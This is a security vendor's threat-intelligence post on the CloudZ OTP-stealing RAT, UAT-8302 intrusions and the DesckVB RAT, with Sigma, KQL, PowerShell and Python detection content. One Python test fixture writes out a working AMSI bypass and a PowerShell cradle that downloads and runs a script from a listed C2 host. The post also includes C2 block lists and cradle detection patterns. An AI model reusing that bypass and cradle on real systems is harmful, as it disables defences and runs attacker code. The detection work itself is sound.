
CloudZ OTP Theft, UAT-8302 APT Intrusions, and DesckVB RAT: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
June 5, 2026
6 min read

Threat Summary

Current OTX pulses show criminal and state-sponsored activity converging on enterprise credentials and infrastructure. The first concern is the CloudZ RAT and its "Pheno" plugin, which reads the data that Microsoft Phone Link synchronises onto the Windows host and so intercepts SMS one-time passcodes without ever touching the phone. Second, the UAT-8302 threat actor (China-nexus) is exploiting critical vulnerabilities (CVE-2025-0994, CVE-2025-20333, CVE-2025-20362) to deliver bespoke malware families such as NetDraft and CloudSorcerer v3 against government and telecom targets. Third, a widespread DesckVB RAT campaign uses personalised malspam and Google DoubleClick redirects to deliver in-memory payloads that sidestep signature-based detection.

Threat Actor / Malware Profile

UAT-8302 (APT)

  • Profile: China-nexus APT group targeting government, telecommunications, and technology sectors in South America and Southeastern Europe.
  • Tooling: Deploys a diverse toolkit that includes NetDraft (a .NET variant of FinalDraft), CloudSorcerer v3, SNOWRUST, and DeedRAT.
  • Behavior: Focuses on extensive reconnaissance and credential harvesting. Leverages zero-day and n-day CVEs for initial access.

CloudZ RAT & Pheno Plugin

  • Distribution: Undocumented, likely via phishing or trojanized utilities.
  • Behavior: CloudZ acts as the primary RAT, while the Pheno plugin specifically targets the Microsoft Phone Link app data (stored locally on the PC) to steal synchronized SMS messages and OTPs.
  • Evasion: Uses dynamic memory allocation to evade detection and reads the synced copy of mobile data on the PC rather than attacking the phone directly, so mobile-side controls (MDM, mobile AV) never see the theft; the observable is a foreign process reading the Phone Link package directory on the Windows host.

DesckVB RAT

  • Distribution: Sophisticated malspam campaign utilizing "dynamic delivery kits" that insert victim email addresses and company logos into lure documents in real-time.
  • Behavior: The lure link bounces through a Google DoubleClick redirect, so the URL an email gateway sees belongs to a trusted ad domain. Multi-stage infection chain: malspam → HTML redirect → JScript loader → PowerShell dropper → VenomRAT/DesckVB.
  • Evasion: Heavy reliance on in-memory execution and AMSI bypass techniques.

IOC Analysis

The indicators in the pulses cover three vectors (files, vulnerabilities, network):

  • File Hashes: A significant volume of SHA256, MD5, and SHA1 hashes are associated with the payloads. Blocklist them on endpoints and run retroactive hunts over EDR telemetry, but treat a hash match as confirmation of a known sample only; the DesckVB loader is rebuilt per victim and the behavioural rules below are what catch the next build.
  • CVEs: CVE-2025-0994 (Trimble Cityworks deserialization) and CVE-2025-20333 / CVE-2025-20362 (Cisco ASA and FTD VPN web server) are the vulnerabilities tied to UAT-8302 access. They are patch-now items; confirm affected versions against the vendor advisories and treat any instance that sat exposed unpatched as potentially compromised.
  • Network Indicators: Hostnames such as xtadts.ddns.net and afxwd.ddns.net show DDNS being used for C2. Block and alert on the hostnames at the perimeter and in DNS filtering rather than on the resolved IPs, which the operator can re-point at will.
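Blocking the two DDNS hostnames catches this campaign only; the generalisation a detection engineer wants is to alert on any query into a dynamic-DNS zone from an unexpected process, because the operator can register a fresh name in minutes. The following Python is an added example, not code from the pulse, Talos or Huntress: it does both, exact IOC matches plus a zone check, over constructed pipe-separated DNS query records modelled on Sysmon Event ID 22 fields. The zone list is an assumption to extend from your own baseline.

```python
# Added example: classify DNS query records by exact C2 IOC match or dynamic-DNS zone.
# The record format (UtcTime|Computer|Image|QueryName|QueryResults) is constructed for the
# example after Sysmon Event ID 22; adapt the parser to your own DNS telemetry.
from dataclasses import dataclass
from typing import List, Optional

# Hostnames from the pulse (exact-match IOCs).
IOC_HOSTS = {
    "xtadts.ddns.net",
    "afxwd.ddns.net",
    "catalogo.castrouria.com",
    "fostercareintheus.optimizationprime.com",
}

# Dynamic-DNS provider zones (assumed starting list, not exhaustive). Any name under these
# can be registered and re-pointed by an attacker at no cost.
DDNS_ZONES = (
    "ddns.net", "no-ip.org", "no-ip.com", "hopto.org", "zapto.org",
    "sytes.net", "duckdns.org", "dyndns.org",
)


@dataclass
class DnsAlert:
    utc_time: str
    computer: str
    image: str     # basename of the querying process
    query: str     # normalised query name
    reason: str    # "ioc_match" or "ddns_zone"


def normalise(name: str) -> str:
    """Lower-case and strip the trailing dot so 'afxwd.ddns.net.' equals 'afxwd.ddns.net'."""
    return name.strip().rstrip(".").lower()


def classify(query: str) -> Optional[str]:
    q = normalise(query)
    if q in IOC_HOSTS:
        return "ioc_match"
    # Only names *under* a zone count; a query for the zone apex itself is not a customer host.
    if any(q.endswith("." + zone) for zone in DDNS_ZONES):
        return "ddns_zone"
    return None


def scan(lines: List[str]) -> List[DnsAlert]:
    alerts: List[DnsAlert] = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            utc_time, computer, image, query, _results = line.split("|", 4)
        except ValueError:
            continue  # malformed record: skip it rather than abort the hunt
        reason = classify(query)
        if reason:
            alerts.append(DnsAlert(utc_time, computer,
                                   image.rsplit("\\", 1)[-1].lower(),
                                   normalise(query), reason))
    return alerts


# Constructed sample records (not real telemetry).
SAMPLE_LOG = """\
# UtcTime|Computer|Image|QueryName|QueryResults
2026-06-05 09:14:02.117|WS-0412|C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe|www.microsoft.com|::ffff:20.70.246.20;
2026-06-05 09:15:40.530|WS-0412|C:\\Windows\\System32\\wscript.exe|xtadts.ddns.net|::ffff:198.51.100.23;
2026-06-05 09:15:41.002|WS-0412|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|afxwd.ddns.net.|::ffff:198.51.100.23;
2026-06-05 09:20:11.871|WS-0207|C:\\Users\\jdoe\\AppData\\Roaming\\update\\svc.exe|relay-west.hopto.org|::ffff:203.0.113.9;
2026-06-05 09:21:03.004|WS-0207|C:\\Windows\\System32\\svchost.exe|DDNS.NET|
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG.splitlines()):
        print(f"{a.utc_time} {a.computer} {a.image} {a.query} -> {a.reason}")
```

The two reasons deserve different handling: an `ioc_match` is an incident, while a `ddns_zone` hit from a browser is often benign (hobbyist services, IP cameras) and should be scored by the querying process, so a script host, PowerShell or a binary under AppData querying a DDNS name is the combination to page on.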

Detection Engineering

YAML
title: CloudZ Pheno Plugin - Microsoft Phone Link Data Access
id: 649a8f2a-1b0c-4c3d-8e5f-9a2b3c4d5e6f
description: Detects processes other than Phone Link itself reading the locally synchronised Phone Link data (messages, notifications), the behaviour attributed to the CloudZ Pheno plugin when it harvests SMS OTPs from the PC rather than from the phone. File-read telemetry is not collected by default; this rule needs Sysmon/ETW file access events or object-access auditing (Event ID 4663) on the Packages directory.
status: experimental
date: 2026-06-06
author: Security Arsenal
references:
    - https://blog.talosintelligence.com/cloudz-pheno-infostealer/
tags:
    - attack.credential_access
    - attack.t1111
    - attack.collection
    - attack.t1005
logsource:
    category: file_access
    product: windows
detection:
    selection:
        TargetFilename|contains:
            - '\AppData\Local\Packages\Microsoft.YourPhone_'
            - '\AppData\Local\Packages\Microsoft.CrossDevice_'
    filter_legit:
        Image|endswith:
            - '\PhoneExperienceHost.exe'
            - '\explorer.exe'
            - '\SearchProtocolHost.exe'
    condition: selection and not filter_legit
falsepositives:
    - Backup, sync and indexing tools that read AppData\Local\Packages; add them to filter_legit after baselining
level: high
---
title: DesckVB RAT - Script Host Launching Encoded or Downloading PowerShell
id: 7a5b9c3d-2e1f-4a5b-8c6d-0e1f2a3b4c5d
description: Detects the DesckVB/VenomRAT loader stage, in which a JScript file run by wscript.exe or cscript.exe spawns PowerShell with an encoded command or an in-memory download cradle. The DoubleClick redirect happens in the browser before the loader runs and never appears on a process command line, so it is deliberately not a condition here; correlate with proxy logs instead.
status: experimental
date: 2026-06-06
author: Security Arsenal
references:
    - https://www.huntress.com/blog/malspam-to-deskcvb-rat-delivery-chain-analysis
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1059.007
    - attack.t1204.002
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\wscript.exe'
            - '\cscript.exe'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_args:
        CommandLine|contains:
            - 'EncodedCommand'
            - ' -e '
            - ' -enc '
            - 'DownloadString'
            - 'DownloadFile'
            - 'FromBase64String'
            - 'Invoke-Expression'
            - 'IEX'
    condition: all of selection_*
falsepositives:
    - Logon or deployment scripts that wrap PowerShell in WSH; exclude them by script path or signature, not by disabling the rule
level: critical
---
title: UAT-8302 - IIS Worker Process Spawning a Shell (Post-Exploitation of CVE-2025-0994)
id: 8b6c0d4e-3f2a-5b6c-9d7e-1f2a3b4c5d6e
description: Endpoint telemetry carries no CVE identifiers, so exploitation of CVE-2025-0994 (Trimble Cityworks, hosted on IIS) is detected through its first post-exploitation step, the IIS worker process w3wp.exe spawning a command interpreter or download tool. CVE-2025-20333 and CVE-2025-20362 affect Cisco ASA/FTD appliances and must be covered by IDS signatures and appliance logs, not by a Windows rule.
status: experimental
date: 2026-06-06
author: Security Arsenal
references:
    - https://blog.talosintelligence.com/uat-8302/
tags:
    - attack.initial_access
    - attack.t1190
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\w3wp.exe'
    selection_child:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\certutil.exe'
    condition: all of selection_*
falsepositives:
    - Web applications that legitimately shell out from the worker process; baseline per application pool and exclude by command line
level: high
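The script-host rule above only sees the command line, and the cradle it is looking for usually sits inside the -EncodedCommand blob where a plain string match cannot reach it. The following Python is an added example, not code from the page, Huntress or Talos: it applies the same parent/child logic to constructed Sysmon-style process-creation events and decodes the UTF-16LE base64 payload so the download cradle and the AMSI tampering can be matched directly. The event records and the dropper script are constructed for the example; the hostname in the cradle is one of the pulse IOCs.

```python
# Added example: evaluate the wscript/cscript -> PowerShell chain over constructed process events,
# decoding -EncodedCommand so indicators hidden in base64 become visible to the match.
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
# Tokens that mark an in-memory download cradle or AMSI bypass once the command is readable.
SUSPICIOUS_TOKENS = (
    "downloadstring", "downloadfile", "invoke-expression", "iex",
    "frombase64string", "amsiutils", "amsiinitfailed",
)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the blob after it is base64.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def encode_ps(script: str) -> str:
    """What the dropper does: UTF-16LE then base64, the encoding -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Inverse of encode_ps; None when there is no encoded command or it does not decode."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_chain(ev: ProcEvent) -> Optional[Dict]:
    """Fire when a WSH script host spawns PowerShell with an encoded command or a cradle."""
    if basename(ev.image) not in POWERSHELL or basename(ev.parent_image) not in SCRIPT_HOSTS:
        return None
    decoded = decode_encoded_command(ev.command_line)
    haystack = f"{ev.command_line} {decoded or ''}".lower()
    indicators = sorted(t for t in SUSPICIOUS_TOKENS if t in haystack)
    if decoded is None and not indicators:
        return None  # a script host running plain PowerShell is too noisy on its own
    return {
        "parent": basename(ev.parent_image),
        "decoded_command": decoded,
        "indicators": indicators,
        "severity": "critical" if indicators else "high",
    }


def run_detection(events: List[ProcEvent]) -> List[Dict]:
    return [alert for alert in (detect_chain(e) for e in events) if alert]


# Constructed dropper script and events (not real telemetry). The cradle and the AMSI patch
# are only visible after decoding.
DROPPER_SCRIPT = (
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);"
    "IEX (New-Object Net.WebClient).DownloadString('http://xtadts.ddns.net/s.ps1')"
)
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(PS_PATH, r"C:\Windows\System32\wscript.exe",
              "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + encode_ps(DROPPER_SCRIPT)),
    ProcEvent(PS_PATH, r"C:\Windows\explorer.exe",
              "powershell.exe -NoProfile -Command Get-Date"),               # benign interactive use
    ProcEvent(PS_PATH, r"C:\Windows\System32\cscript.exe",
              "powershell.exe -ExecutionPolicy Bypass -File C:\\logon\\map-drives.ps1"),  # noisy, not the chain
]

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        print(alert["severity"], alert["parent"], alert["indicators"])
```

In production the same decode step belongs in the SIEM pipeline (or you rely on Script Block Logging, Event ID 4104, which records the decoded script for you); the point of the example is that an encoded command line is itself the signal and the indicators only appear after the decode.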


kql
// Hunt for DesckVB RAT / CloudZ C2 hostnames in Defender network telemetry.
// RemoteUrl carries a bare hostname or a full URL depending on the event source, so use has_any rather than in.
let C2Hosts = dynamic([
    "xtadts.ddns.net",
    "afxwd.ddns.net",
    "catalogo.castrouria.com",
    "fostercareintheus.optimizationprime.com"
]);
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (C2Hosts)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName,
          InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort, Protocol
| order by Timestamp desc

// Hunt for CloudZ and UAT-8302 payload hashes. Include file writes and module loads as well as
// process starts: loaders and plugins such as the Pheno DLL never appear as a process of their own.
let Sha256s = dynamic([
    "5b7284bcf30569ae400e416a62391720cc9081e6047f15816f9d1a04a06eb321",
    "fb6cebadd49d202c8c7b5cdd641bd16aac8258429e8face365a94bd32e253b00",
    "c356aff1a01c2b0da472e584c8e3c8f875b9a24280435d42836a77b19f5a8c18"
]);
let Md5s = dynamic(["a39299719bb4151c373a0e9b92b2bd05"]);
union DeviceProcessEvents, DeviceFileEvents, DeviceImageLoadEvents
| where Timestamp > ago(30d)
| where SHA256 in~ (Sha256s) or MD5 in~ (Md5s)
| project Timestamp, DeviceName, ActionType, FileName, FolderPath, SHA256, MD5,
          InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessParentFileName
| order by Timestamp desc


powershell
<#
.SYNOPSIS
IOC Hunt Script for CloudZ, DesckVB, and UAT-8302 Malware
.DESCRIPTION
Checks the hosts file and the DNS client cache for DesckVB C2 hostnames, scans temp and download
directories of every profile for known payload hashes (SHA256 and MD5), and flags binaries in the
Phone Link package directories that the CloudZ Pheno plugin targets when they are not Microsoft-signed.
Run elevated so that other users' profiles and C:\Windows\Temp are readable.
#>

$Sha256Hashes = @(
    "5b7284bcf30569ae400e416a62391720cc9081e6047f15816f9d1a04a06eb321",
    "fb6cebadd49d202c8c7b5cdd641bd16aac8258429e8face365a94bd32e253b00",
    "c356aff1a01c2b0da472e584c8e3c8f875b9a24280435d42836a77b19f5a8c18"
)
$Md5Hashes = @(
    "a39299719bb4151c373a0e9b92b2bd05"
)

$C2Hosts = @(
    "xtadts.ddns.net",
    "afxwd.ddns.net",
    "catalogo.castrouria.com",
    "fostercareintheus.optimizationprime.com"
)

Write-Host "[+] Starting IOC Hunt..." -ForegroundColor Cyan

# 1. Hosts file and DNS client cache. Note: $Host is a reserved automatic variable in PowerShell,
#    so the loop variable must be named something else or the assignment throws.
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
Write-Host "[+] Checking $HostsPath and the DNS client cache for C2 hostnames..." -ForegroundColor Yellow
$HostsContent = if (Test-Path $HostsPath) { Get-Content $HostsPath -ErrorAction SilentlyContinue } else { @() }
$DnsCache = Get-DnsClientCache -ErrorAction SilentlyContinue
foreach ($C2Host in $C2Hosts) {
    # -SimpleMatch: hostnames contain dots, which -match would treat as regex wildcards
    if ($HostsContent | Select-String -SimpleMatch $C2Host -Quiet) {
        Write-Host "[!] ALERT: C2 hostname found in hosts file: $C2Host" -ForegroundColor Red
    }
    if ($DnsCache | Where-Object { $_.Entry -eq $C2Host -or $_.RecordName -eq $C2Host }) {
        Write-Host "[!] ALERT: C2 hostname in DNS client cache (resolved recently): $C2Host" -ForegroundColor Red
    }
}

# 2. Scan temp and download folders of every profile for known payload hashes
Write-Host "[+] Scanning temp and download directories for known malware hashes..." -ForegroundColor Yellow
$PathsToScan = @("$env:SystemRoot\Temp")
Get-ChildItem -Path "$env:SystemDrive\Users" -Directory -ErrorAction SilentlyContinue | ForEach-Object {
    $PathsToScan += "$($_.FullName)\AppData\Local\Temp"
    $PathsToScan += "$($_.FullName)\Downloads"
}

foreach ($Path in $PathsToScan) {
    if (-not (Test-Path $Path)) { continue }
    # -File: Get-FileHash fails on directories; skip very large files to keep the scan quick
    Get-ChildItem -Path $Path -File -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -lt 200MB } |
        ForEach-Object {
            $Sha256 = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($Sha256 -and ($Sha256Hashes -contains $Sha256.ToLower())) {
                Write-Host "[!] ALERT: Malware file found (SHA256): $($_.FullName) | $Sha256" -ForegroundColor Red
                return   # inside ForEach-Object, return moves to the next file
            }
            $Md5 = (Get-FileHash -LiteralPath $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
            if ($Md5 -and ($Md5Hashes -contains $Md5.ToLower())) {
                Write-Host "[!] ALERT: Malware file found (MD5): $($_.FullName) | $Md5" -ForegroundColor Red
            }
        }
}

# 3. Phone Link package directories: CloudZ Pheno reads the synced SMS/OTP data stored here.
#    A point-in-time script cannot see reads; the Sigma file_access rule or the USN journal covers that.
#    Here we flag executables and DLLs dropped into the package tree that are not Microsoft-signed.
Write-Host "[+] Checking Phone Link package directories for planted binaries..." -ForegroundColor Yellow
Get-ChildItem -Path "$env:SystemDrive\Users\*\AppData\Local\Packages" -Directory -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -like "Microsoft.YourPhone_*" -or $_.Name -like "Microsoft.CrossDevice_*" } |
    ForEach-Object {
        Write-Host "    Found $($_.FullName)"
        Get-ChildItem -Path $_.FullName -Recurse -File -Include *.exe, *.dll -ErrorAction SilentlyContinue | ForEach-Object {
            $Sig = Get-AuthenticodeSignature -FilePath $_.FullName
            if ($Sig.Status -ne 'Valid' -or $Sig.SignerCertificate.Subject -notmatch 'Microsoft Corporation') {
                Write-Host "[!] Suspicious binary in Phone Link data directory: $($_.FullName) (signature: $($Sig.Status))" -ForegroundColor Red
            }
        }
    }

Write-Host "[+] Hunt Complete." -ForegroundColor Green

Response Priorities

Immediate

  • Block IOCs: Implement immediate blocklists for the SHA256 hashes and DDNS hostnames provided in the pulses on firewalls, EDRs, and Secure Web Gateways.
  • Patch Management: Prioritize patching of the affected products (Trimble Cityworks for CVE-2025-0994; Cisco ASA/FTD for CVE-2025-20333 and CVE-2025-20362), internet-facing instances first. Any instance that was reachable while unpatched needs a post-exploitation hunt (web shells, shells spawned by the web worker, new local accounts), not just the patch.

24h

  • Identity Audit: Given the CloudZ Pheno plugin's ability to read SMS OTPs and credentials, force a password reset and MFA re-enrollment for accounts tied to devices where Phone Link abuse is detected. Re-enrolling the same SMS factor leaves the weakness in place, since the codes are mirrored to the compromised PC; move affected users to an authenticator app or FIDO2 key where possible.
  • Email Filtering: Tune secure email gateways to detonate or strip HTML attachments and to follow ad-network redirects (DoubleClick) to their final destination before issuing a verdict; the personalised lures defeat static template signatures, so the redirect and the attachment type are the stable indicators.

1 Week

  • Architecture Review: Evaluate the necessity of Microsoft Phone Link in the enterprise environment. If not required, restrict or uninstall it to mitigate the CloudZ attack vector.
  • Harden Scripting: Turn on PowerShell Script Block Logging (Event ID 4104) and Module Logging, keep AMSI providers active, and consider Constrained Language Mode through AppLocker or WDAC. DesckVB's in-memory stages then surface as decoded script blocks even when the dropper is only an encoded command line.
